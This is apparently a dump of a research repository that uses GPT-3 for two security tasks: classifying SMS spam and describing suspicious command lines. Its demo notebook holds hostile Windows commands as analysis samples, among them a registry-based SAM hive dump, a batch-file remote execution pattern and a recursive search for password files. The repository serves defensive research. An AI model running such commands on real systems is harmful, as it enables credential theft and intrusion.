├── requirements.txt
├── spam_detector
    ├── spam_data
    │   ├── results_mean_f1_plot.pdf
    │   └── experiment_1
    │   │   ├── results_f1_plot.pdf
    │   │   ├── results_gpt3_finetune.csv
    │   │   ├── results_gpt3_fewshot.csv
    │   │   ├── train_2.csv
    │   │   ├── results_randomforest.csv
    │   │   ├── results_logisticregression.csv
    │   │   ├── train_8.csv
    │   │   ├── train_32.csv
    │   │   ├── test.csv
    │   │   └── train_512.csv
    ├── README.md
    ├── spam_demo.ipynb
    ├── sklearn_models.py
    ├── gpt3_models.py
    └── spam_detector.py
├── command_analyzer
    ├── cmd_data
    │   ├── data_cmd_tag_and_gold_reference_desc.json.zip
    │   └── results_data_cmd_tag_and_gold_reference_desc.json_scores.csv
    ├── README.md
    ├── command_demo.ipynb
    ├── similarity.py
    ├── prompt_data.py
    └── command_analyzer.py
├── README.md
└── LICENSE

/requirements.txt:
--------------------------------------------------------------------------------
numpy==1.19.4
pandas==1.3.3
scikit-learn==0.20.3
nltk==3.4
matplotlib==3.5.1
openai==0.20.0

--------------------------------------------------------------------------------
/spam_detector/spam_data/results_mean_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/results_mean_f1_plot.pdf

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/experiment_1/results_f1_plot.pdf

--------------------------------------------------------------------------------
/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_finetune.csv:
--------------------------------------------------------------------------------
train_size,test_precision,test_recall,test_f1-score,test_support
512,0.9926339285714285,0.9921875,0.9922847939851616,256
1024,1.0,1.0,1.0,256

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_fewshot.csv:
--------------------------------------------------------------------------------
train_size,test_precision,test_recall,test_f1-score,test_support
2,0.9446328364624965,0.9140625,0.9220379203515667,256
8,0.9773846557853911,0.9765625,0.9768543819554849,256
32,0.9801682692307693,0.9765625,0.9773792613636364,256

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_2.csv:
--------------------------------------------------------------------------------
label text
Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_randomforest.csv:
--------------------------------------------------------------------------------
train_size,test_precision,test_recall,test_f1-score,test_support
2,0.890686274509804,0.875,0.8203605710066454,256
8,0.8925623739919355,0.89453125,0.8651752077831287,256
32,0.8260624562324931,0.85546875,0.8365655304963634,256
512,0.9723597935267857,0.97265625,0.9724764993116503,256
1024,0.9723597935267857,0.97265625,0.9724764993116503,256

--------------------------------------------------------------------------------
/command_analyzer/cmd_data/results_data_cmd_tag_and_gold_reference_desc.json_scores.csv:
--------------------------------------------------------------------------------
,ngram_bleu_generated_description_score,ngram_bleu_baseline_description_score,semantic_similarity_generated_description_score,semantic_similarity_baseline_description_score
mean,0.20269268573332166,0.18891764397772917,0.9193342014745949,0.9046513387951954
std,0.10771449055627129,0.10937139147679167,0.02980726068908328,0.04784594717568072

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_logisticregression.csv:
--------------------------------------------------------------------------------
train_size,test_precision,test_recall,test_f1-score,test_support
2,0.8352011308909528,0.6953125,0.7423407521724168,256
8,0.8814179345275345,0.80078125,0.8268168000650431,256
32,0.9171266417572463,0.83203125,0.8551778036153037,256
512,0.9608743134355384,0.95703125,0.9583006471367891,256
1024,0.9682624260622887,0.96484375,0.9658823476573728,256

--------------------------------------------------------------------------------
/command_analyzer/README.md:
--------------------------------------------------------------------------------
# Command analyzer

Invoke the following command to translate a command line into a natural language description.

```
python command_analyzer.py --cmd="command line" --tags="comma separated tags"
```

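Command lines under analysis often contain quotes, backslashes, and pipes, which makes shell quoting error-prone. The following is a minimal sketch, assuming the script is launched from Python rather than typed into a shell: it builds the argument list directly so the analyzed command needs no extra escaping. The helper name `build_analyzer_argv` is hypothetical; only the `--cmd` and `--tags` options come from the usage shown here, and the example values are taken from the demo notebook.

```python
import shlex
import sys


def build_analyzer_argv(cmd, tags):
    """Build an argv list for command_analyzer.py (hypothetical helper).

    Only --cmd and --tags are taken from the README usage. Passing the
    list to subprocess.run() avoids shell quoting of the analyzed command.
    """
    return [
        sys.executable,
        "command_analyzer.py",
        "--cmd={}".format(cmd),
        "--tags={}".format(",".join(tags)),
    ]


# Example values taken from the demo notebook in this repository.
command = r'"cmd.exe" dir /b /s "C:\Users\Pcs\Desktop\*.*" | findstr /i "password"'
argv = build_analyzer_argv(
    command, ["win_pc_suspicious_dir", "win_suspicious_findstr"])

# Shell-quoted form, for display or logging only (POSIX quoting rules).
print(" ".join(shlex.quote(arg) for arg in argv))
# To actually run the analyzer: subprocess.run(argv, check=True)
```

Keeping the arguments as a list means the pipe and the embedded quotes reach the script unchanged instead of being interpreted by the shell.
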
Invoke the following command to evaluate our back-translation approaches.

First unzip the cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip file; the password is the name of this repository.

```
python command_analyzer.py --run_type=evaluate_approaches --path_output_json="cmd_data/results_data_cmd_tag_and_gold_reference_desc.json" --path_input_json="cmd_data/data_cmd_tag_and_gold_reference_desc.json"
```

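The unzip step can also be done from Python. This is a rough sketch under two assumptions that the README does not confirm: that the archive uses the legacy zip encryption that the standard `zipfile` module can decrypt, and that the password is the repository name as it appears in the URLs (`gpt3-and-cybersecurity`). The helper name `unzip_dataset` is hypothetical.

```python
import zipfile
from pathlib import Path


def unzip_dataset(zip_path, out_dir, password):
    """Extract a password-protected zip archive into out_dir.

    Note: the standard zipfile module only decrypts legacy ZipCrypto
    archives; an AES-encrypted archive needs an external tool instead.
    """
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(zip_path) as archive:
        # pwd must be bytes; it is ignored for unencrypted members.
        archive.extractall(path=str(out_dir), pwd=password.encode("utf-8"))
        return sorted(archive.namelist())


# Usage (assumption: the password is the repository name from the URLs):
# unzip_dataset(
#     "cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip",
#     "cmd_data",
#     password="gpt3-and-cybersecurity",
# )
```

If extraction fails with a bad-password or unsupported-compression error, the archive probably uses a scheme `zipfile` cannot handle, and a command-line unzip tool is the simpler route.
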
Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/command_analyzer/command_demo.ipynb).

# Dataset

The cmd_data folder provides a dataset that includes command lines, tags, and reference descriptions.

--------------------------------------------------------------------------------
/spam_detector/README.md:
--------------------------------------------------------------------------------
# Spam detector

Invoke the following command to classify a message as spam or ham.

```
python spam_detector.py --message="test message"
```

The above command generates a prompt using two in-context samples from [a training dataset](./spam_data/experiment_1/train_2.csv). The default training file can be changed with the --path_train_data option.

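To make the idea of in-context samples concrete, here is a minimal sketch of how a two-sample prompt could be assembled. The `Message:`/`Label:` template and the helper name `build_few_shot_prompt` are assumptions for illustration; the template actually used by gpt3_models.py is not shown in this section. The two samples are the rows of train_2.csv.

```python
def build_few_shot_prompt(samples, message):
    """Build a few-shot classification prompt (hypothetical template).

    samples: list of (label, text) pairs used as in-context examples.
    message: the new message to classify.
    """
    lines = []
    for label, text in samples:
        lines.append("Message: {}".format(text))
        lines.append("Label: {}".format(label))
        lines.append("")  # blank line between examples
    lines.append("Message: {}".format(message))
    lines.append("Label:")  # the model is expected to complete this line
    return "\n".join(lines)


# The two in-context samples from spam_data/experiment_1/train_2.csv.
samples = [
    ("Ham", "Am on the uworld site. Am i buying the qbank only or am i "
            "buying it with the self assessment also?"),
    ("Spam", "Free-message: Jamster!Get the crazy frog sound now! For poly "
             "text MAD1, for real text MAD2 to 88888. 6 crazy sounds for "
             "just 3 GBP/week! 16+only! T&C's apply"),
]
prompt = build_few_shot_prompt(samples, "test message")
print(prompt)
```

Ending the prompt with an open `Label:` line leaves the model a single short completion to produce, which is then read as the predicted class.
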

Invoke the following command to evaluate spam detection approaches which include traditional ML models and novel GPT-3 models.

```
python spam_detector.py --run_type=evaluate_approaches --path_data_folder=spam_data --num_experiments=5
```

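Once an evaluation has produced results files, the approaches can be compared by train size. The sketch below assumes each approach writes a `results_<model>.csv` with the columns seen under experiment_1; the helper name `f1_by_train_size` is hypothetical, and the rows are copied from the experiment_1 files in this repository so the example stays self-contained.

```python
import csv
import io


def f1_by_train_size(csv_text):
    """Map train_size -> test F1 score from one results CSV given as text."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {int(row["train_size"]): float(row["test_f1-score"])
            for row in reader}


HEADER = "train_size,test_precision,test_recall,test_f1-score,test_support\n"

# Rows copied from the experiment_1 results files (train sizes 2 and 8 only).
RESULTS = {
    "logisticregression": HEADER
    + "2,0.8352011308909528,0.6953125,0.7423407521724168,256\n"
    + "8,0.8814179345275345,0.80078125,0.8268168000650431,256\n",
    "gpt3_fewshot": HEADER
    + "2,0.9446328364624965,0.9140625,0.9220379203515667,256\n"
    + "8,0.9773846557853911,0.9765625,0.9768543819554849,256\n",
}

table = {name: f1_by_train_size(text) for name, text in RESULTS.items()}
for size in (2, 8):
    # Pick the approach with the highest F1 at this train size.
    best = max(table, key=lambda name: table[name][size])
    print("train_size={}: best={} (F1={:.3f})".format(
        size, best, table[best][size]))
```

In practice the CSV text would be read from the files in each experiment folder rather than embedded as strings.
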
Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/spam_detector/spam_demo.ipynb).

# Spam dataset

The spam_data folder provides training and test datasets that were randomly sampled from a spam dataset. The [spam data](./spam_data/SMSSpamCollection) is from the [UCI SMS Spam Collection data set](https://archive.ics.uci.edu/ml/datasets/sms+spam+collection).

--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_8.csv:
--------------------------------------------------------------------------------
label text
Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
Ham Just sent it. So what type of food do you like?
Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Sophos AI GPT-3 for Cybersecurity Repository

A key lesson of recent deep learning successes is that as we scale neural networks, they get better, and sometimes in game-changing ways.
This repo provides two applications which demonstrate how GPT-3 opens new vistas for cybersecurity.

## How do I get started?

There are two use cases: spam detection and command analysis.
As the code in this repo uses the OpenAI API, set the OPENAI_API_KEY environment variable to your API key.
Refer to the OpenAI documentation at https://beta.openai.com/docs/introduction.

### Spam detector
Spam detector demonstrates how to identify spam messages using GPT-3 few-shot learning or fine-tuning.

Change directory to the spam_detector folder and follow the [instructions](./spam_detector/README.md).


### Command analyzer
Command analyzer shows how to analyze complex command lines using GPT-3 few-shot learning.

Change directory to the command_analyzer folder and follow the [instructions](./command_analyzer/README.md).


## How do I cite GPT-3 for Cybersecurity?
25 | 26 | *Questions, ideas, feedback appreciated, please email younghoo.lee@sophos.com* 27 | 28 | @misc{Lee2022, 29 | author = {Lee, Younghoo}, 30 | title = {GPT-3 for Cybersecurity}, 31 | year = {2022}, 32 | publisher = {GitHub}, 33 | journal = {GitHub repository}, 34 | howpublished = {\url{https://github.com/sophos-ai/gpt3-cybersecurity/}} 35 | } 36 | -------------------------------------------------------------------------------- /spam_detector/spam_demo.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import os\n", 10 | "import logging\n", 11 | "\n", 12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n", 13 | "\n", 14 | "from spam_detector import classify_message\n", 15 | "\n", 16 | "logging.disable(logging.CRITICAL)\n", 17 | "\n", 18 | "def test_message(message, label):\n", 19 | " model_label = classify_message(\n", 20 | " message, \n", 21 | " path_train_data=\"spam_data/experiment_1/train_2.csv\", \n", 22 | " num_samples_in_prompt=2\n", 23 | " )\n", 24 | " print(\"label:{}, model_label:{}\".format(label, model_label))\n" 25 | ] 26 | }, 27 | { 28 | "cell_type": "code", 29 | "execution_count": null, 30 | "metadata": {}, 31 | "outputs": [], 32 | "source": [ 33 | "#update the \"YOUR_API_KEY\" with your key value." 
34 | ] 35 | }, 36 | { 37 | "cell_type": "code", 38 | "execution_count": 2, 39 | "metadata": {}, 40 | "outputs": [ 41 | { 42 | "name": "stdout", 43 | "output_type": "stream", 44 | "text": [ 45 | "label:Spam, model_label:Spam\n" 46 | ] 47 | } 48 | ], 49 | "source": [ 50 | "message = \"Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p\"\n", 51 | "\n", 52 | "test_message(message, label=\"Spam\")" 53 | ] 54 | }, 55 | { 56 | "cell_type": "code", 57 | "execution_count": 3, 58 | "metadata": {}, 59 | "outputs": [ 60 | { 61 | "name": "stdout", 62 | "output_type": "stream", 63 | "text": [ 64 | "label:Spam, model_label:Spam\n" 65 | ] 66 | } 67 | ], 68 | "source": [ 69 | "message = \"Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com\"\n", 70 | "\n", 71 | "test_message(message, label=\"Spam\")" 72 | ] 73 | }, 74 | { 75 | "cell_type": "code", 76 | "execution_count": 4, 77 | "metadata": {}, 78 | "outputs": [ 79 | { 80 | "name": "stdout", 81 | "output_type": "stream", 82 | "text": [ 83 | "label:Ham, model_label:Ham\n" 84 | ] 85 | } 86 | ], 87 | "source": [ 88 | "message = \"And you! Will expect you whenever you text! Hope all goes well tomo\"\n", 89 | "\n", 90 | "test_message(message, label=\"Ham\")" 91 | ] 92 | }, 93 | { 94 | "cell_type": "code", 95 | "execution_count": 5, 96 | "metadata": {}, 97 | "outputs": [ 98 | { 99 | "name": "stdout", 100 | "output_type": "stream", 101 | "text": [ 102 | "label:Ham, model_label:Ham\n" 103 | ] 104 | } 105 | ], 106 | "source": [ 107 | "message = \"I'm okay. Chasing the dream. What's good. 
What are you doing next.\"\n", 108 | "\n", 109 | "test_message(message, label=\"Ham\")" 110 | ] 111 | } 112 | ], 113 | "metadata": { 114 | "kernelspec": { 115 | "display_name": "Python 3.7.3 ('py37')", 116 | "language": "python", 117 | "name": "python3" 118 | }, 119 | "language_info": { 120 | "codemirror_mode": { 121 | "name": "ipython", 122 | "version": 3 123 | }, 124 | "file_extension": ".py", 125 | "mimetype": "text/x-python", 126 | "name": "python", 127 | "nbconvert_exporter": "python", 128 | "pygments_lexer": "ipython3", 129 | "version": "3.7.3" 130 | }, 131 | "orig_nbformat": 4, 132 | "vscode": { 133 | "interpreter": { 134 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42" 135 | } 136 | } 137 | }, 138 | "nbformat": 4, 139 | "nbformat_minor": 2 140 | } 141 | -------------------------------------------------------------------------------- /spam_detector/sklearn_models.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import logging 3 | from collections import Counter 4 | from sklearn.feature_extraction.text import TfidfVectorizer 5 | from sklearn.ensemble import RandomForestClassifier 6 | from sklearn.linear_model import LogisticRegression 7 | from sklearn.metrics import classification_report 8 | 9 | 10 | logging.basicConfig(format="%(asctime)s %(message)s", 11 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 12 | logger = logging.getLogger(__name__) 13 | 14 | 15 | def extract_features( 16 | df, 17 | column_text="text", 18 | column_label="label", 19 | positive_label="Spam", 20 | max_features=1000, 21 | vectorizer=None, 22 | ): 23 | """ 24 | extract ML features. 
25 | :param df: the data frame for input data 26 | :param column_text: the column for text 27 | :param column_label: the column for label 28 | :param positive_label: the value for positive label 29 | :param max_features: the max number of features 30 | :param vectorizer: vectorizer for test data 31 | """ 32 | if vectorizer is None: 33 | vectorizer = TfidfVectorizer(max_features=max_features) 34 | X = vectorizer.fit_transform(df[column_text]) 35 | else: 36 | X = vectorizer.transform(df[column_text]) 37 | y = df[column_label] == positive_label 38 | return X, y, vectorizer 39 | 40 | 41 | def train_sk_model( 42 | X_train, 43 | X_test, 44 | y_train, 45 | y_test, 46 | model_name="RandomForest" 47 | ): 48 | if model_name == "RandomForest": 49 | model = RandomForestClassifier() 50 | elif model_name == "LogisticRegression": 51 | model = LogisticRegression() 52 | model.fit(X_train, y_train) 53 | 54 | y_pred = model.predict(X_test) 55 | return classification_report(y_test, y_pred, output_dict=True) 56 | 57 | 58 | def evaluate_sklearn_model( 59 | path_train_data, 60 | path_test_data, 61 | model_name="RandomForest", 62 | max_features=1000, 63 | column_text="text", 64 | column_label="label", 65 | positive_label="Spam" 66 | ): 67 | """ 68 | evaluate sklearn models with training and test datasets. 
69 | :param path_train_data: file path for training dataset 70 | :param path_test_data: file path for test dataset 71 | :param model_name: model name 72 | :param max_features: max number of ML features 73 | :param column_text: the column for text 74 | :param column_label: the column for label 75 | :param positive_label: the value for positive label 76 | """ 77 | df_train = pd.read_csv(path_train_data, sep="\t") 78 | logger.info("path_train_data:{}, df_train.shape:{}".format( 79 | path_train_data, df_train.shape)) 80 | 81 | X_train, y_train, vectorizer = extract_features( 82 | df_train, max_features=max_features, 83 | column_text=column_text, column_label=column_label, 84 | positive_label=positive_label) 85 | logger.info("X_train.shape:{}, y_train.shape:{}".format( 86 | X_train.shape, y_train.shape)) 87 | logger.info("y_train.label.count:{}".format(Counter(y_train))) 88 | 89 | df_test = pd.read_csv(path_test_data, sep="\t") 90 | logger.info("path_test_data:{}, df_test.shape:{}".format( 91 | path_test_data, df_test.shape)) 92 | 93 | X_test, y_test, _vectorizer = extract_features( 94 | df_test, max_features=max_features, vectorizer=vectorizer, 95 | column_text=column_text, column_label=column_label, 96 | positive_label=positive_label) 97 | logger.info("X_test.shape:{}, y_test.shape:{}".format( 98 | X_test.shape, y_test.shape)) 99 | logger.info("y_test.label.count:{}".format(Counter(y_test))) 100 | 101 | return train_sk_model(X_train, X_test, y_train, y_test, model_name=model_name) 102 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_32.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham Am in gobi arts college 3 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX 4 | Ham Sorry * was at the grocers. 
5 | Ham Its ok..come to my home it vl nice to meet and v can chat.. 6 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever.... 7 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541 8 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q? 9 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ? 10 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it! 11 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co 12 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 13 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY 14 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins 15 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16 16 | Ham Just sent it. So what type of food do you like? 17 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+ 18 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. 
Tones 3GBP network operator rates apply 19 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!! 20 | Ham Mm you ask him to come its enough :-) 21 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05 22 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ? 23 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 24 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come... 25 | Spam 88066 FROM 88066 LOST 3POUND HELP 26 | Ham I need... Coz i never go before 27 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer 28 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award 29 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 30 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s 31 | Ham Or I guess <#> min 32 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16 33 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH. 
34 | -------------------------------------------------------------------------------- /command_analyzer/command_demo.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import os\n", 10 | "import logging\n", 11 | "\n", 12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n", 13 | "\n", 14 | "from command_analyzer import generate_description\n", 15 | "\n", 16 | "logging.disable(logging.CRITICAL)\n", 17 | "\n", 18 | "def command_to_description(command, tags):\n", 19 | " description, baseline_description, candidates = generate_description(command, tags)\n", 20 | " print(\"description:\\n{}\".format(description))\n", 21 | " print(\"baseline_description:\\n{}\".format(baseline_description)) \n" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 2, 27 | "metadata": {}, 28 | "outputs": [], 29 | "source": [ 30 | "#update the \"YOUR_API_KEY\" with your key value." 31 | ] 32 | }, 33 | { 34 | "cell_type": "code", 35 | "execution_count": 3, 36 | "metadata": {}, 37 | "outputs": [ 38 | { 39 | "name": "stdout", 40 | "output_type": "stream", 41 | "text": [ 42 | "description:\n", 43 | "The command will create a registry value \"command\" under the registry key \"hkcu\\software\\classes\\ms-settings\\shell\\open\" and set its default value to \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\". This default value will then be executed when the user clicks on the Windows \"Settings\" icon. The command will add a value under the \"reg.exe\" key in the \"open\\command\" directory of the \"ms-settings\" key in the \"HKCU\" hive. 
The value data is \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\".\n", 44 | "baseline_description:\n", 45 | "The command will attempt to dump the SAM registry hive to the specified path.\n" 46 | ] 47 | } 48 | ], 49 | "source": [ 50 | "command = \"reg.exe add hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command /ve /d \\\"reg.exe save hklm\\\\sam C:\\\\Users\\\\Pcs\\\\AppData\\\\Local\\\\Temp\\\\sam.save\\\" /f\"\n", 51 | "tags = \"win_pc_reg_dump_sam,win_pc_suspicious_reg_open_command\"\n", 52 | "command_to_description(command, tags)\n" 53 | ] 54 | }, 55 | { 56 | "cell_type": "code", 57 | "execution_count": 4, 58 | "metadata": {}, 59 | "outputs": [ 60 | { 61 | "name": "stdout", 62 | "output_type": "stream", 63 | "text": [ 64 | "description:\n", 65 | "The command will echo the \"dir\" command to a file called \"execute.bat\", write the command to the \"execute.bat\" file, and then execute the \"execute.bat\" file. This command will list the contents of the directory \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" and write the output to \"\\\\127.0.0.1\\C$\\__output\". The \"dir\" command will be executed as the \"Local System\" account.\n", 66 | "baseline_description:\n", 67 | "The command will list the contents of the \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" directory and save the output to \"C:\\__output\". 
It will be executed as the LocalSystem account.\n" 68 | ] 69 | } 70 | ], 71 | "source": [ 72 | "command = \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c echo dir \\\"C:\\\\Users\\\\admin\\\\OneDrive ADMINISTRATORS INC\\\" ^> \\\\\\\\127.0.0.1\\\\C$\\\\__output 2^>^&1 > C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & del C:\\\\WINDOWS\\\\TEMP\\\\execute.bat\"\n", 73 | "tags = \"win_local_system_owner_account_discovery\"\n", 74 | "command_to_description(command, tags)" 75 | ] 76 | }, 77 | { 78 | "cell_type": "code", 79 | "execution_count": 5, 80 | "metadata": {}, 81 | "outputs": [ 82 | { 83 | "name": "stdout", 84 | "output_type": "stream", 85 | "text": [ 86 | "description:\n", 87 | "The command will recursively list all files in the \"C:\\Users\\Pcs\\Desktop\" directory and all subdirectories, and will search the output for files containing the word \"password\".\n", 88 | "baseline_description:\n", 89 | "The command will list all files and directories on the target machine and pipe the output to a search for the string \"password\".\n" 90 | ] 91 | } 92 | ], 93 | "source": [ 94 | "command = \"\\\"cmd.exe\\\" dir /b /s \\\"C:\\\\Users\\\\Pcs\\\\Desktop\\\\*.*\\\" | findstr /i \\\"password\\\"\"\n", 95 | "tags = \"win_pc_suspicious_dir,win_suspicious_findstr\"\n", 96 | "command_to_description(command, tags)" 97 | ] 98 | } 99 | ], 100 | "metadata": { 101 | "kernelspec": { 102 | "display_name": "Python 3.7.3 ('py37')", 103 | "language": "python", 104 | "name": "python3" 105 | }, 106 | "language_info": { 107 | "codemirror_mode": { 108 | "name": "ipython", 109 | "version": 3 110 | }, 111 | "file_extension": ".py", 112 | "mimetype": "text/x-python", 113 | "name": "python", 114 | "nbconvert_exporter": "python", 115 | "pygments_lexer": "ipython3", 116 | "version": "3.7.3" 117 | }, 118 | "orig_nbformat": 4, 119 | "vscode": { 120 | "interpreter": { 121 | "hash": 
"76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42" 122 | } 123 | } 124 | }, 125 | "nbformat": 4, 126 | "nbformat_minor": 2 127 | } 128 | -------------------------------------------------------------------------------- /command_analyzer/similarity.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import logging 3 | from nltk.translate.bleu_score import sentence_bleu 4 | from openai.embeddings_utils import get_embeddings 5 | 6 | 7 | logging.basicConfig(format="%(asctime)s %(message)s", 8 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) 9 | logger = logging.getLogger(__name__) 10 | 11 | 12 | def get_embedding_similarity_score_list( 13 | cmd, 14 | tags, 15 | items, 16 | max_cmd_len=200, 17 | weight_desc_score=0.3, 18 | weight_tags_score=0.2, 19 | engine="text-similarity-babbage-001" 20 | ): 21 | """ 22 | returns a weighted score from cosine similarity scores. 23 | :param cmd: command line data 24 | :param tags: tags data 25 | :param items: contains a list of (desc, generated_cmd) 26 | :param max_cmd_len: max length of command line data 27 | :param weight_desc_score: the weight for description score 28 | :param weight_tags_score: the weight for tags score 29 | :param engine: engine for similarity score 30 | """ 31 | code_items = [cmd[:max_cmd_len]] + [item[1] for item in items] 32 | if weight_tags_score>0: 33 | code_items += [tags] 34 | code_matrix = get_embeddings(code_items, engine=engine) 35 | if weight_tags_score>0: 36 | tags_emb = code_matrix[-1] 37 | 38 | if weight_desc_score>0: 39 | desc_items = [item[0] for item in items] 40 | desc_matrix = get_embeddings(desc_items, engine=engine) 41 | 42 | reference_code_emb = code_matrix[0] 43 | score_list = [] 44 | for ix in range(len(items)): 45 | desc, generated_cmd = items[ix] 46 | #get a cosine similarity score between two embeddings vectors 47 | code_score = np.dot(reference_code_emb, code_matrix[1+ix]) 48 | #get a weighted score from 3 
